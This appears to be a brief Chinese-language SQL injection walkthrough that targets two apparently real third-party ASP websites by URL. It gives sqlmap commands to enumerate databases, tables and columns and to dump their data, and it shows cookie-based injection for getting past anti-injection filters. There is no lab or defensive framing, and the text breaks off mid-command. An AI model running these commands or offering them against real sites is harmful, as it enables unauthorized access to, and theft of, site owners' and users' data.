ASP:
1.网址后面加上一撇 ' 报错 and 1=1 正常显示,and1=2报错 网址:http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 (get注入
)
2.kali Linux打开终端 输入命令 sqlmap -u 网址 --dbs --current-user (-u 输入目标网址 --dbs表示所有的数据库)
3.结果显示出了服务器的的操作系统为Windows2003或是 XP,数据库类型等信息,没有显示出current user
4.kali Linux打开终端 输入命令 sqlmap -u 网址 --tables 最后会显示出几个表名
5.kali Linux打开终端 输入命令 sqlmap -u 网址 -T 表名 --columns ,会拆解出几个列名(-T 指定表名 --columns代表所有的列)
6.kali Linux打开终端 输入命令 sqlmap -u 网址 -T 表名 -C 列名1,列名2 --dump (-C指定要获得的数据的列名,--dump表示下载数据
7.sql不能注入,采取cookie注入 例如 :sqlmap -u http://xaweichi.com/product_list.asp --cookie "id=230" --tables --level 2
8.猜解表段也是一样的:sqlmap -u http://xaweichi.com/product_list.asp --cookie "id=230" --tables --level 2
如果说那个站点他装了防注入程序 拿我们正规的注入就不成效果就用到cookie中转注入
sqlmap -u http://xaweic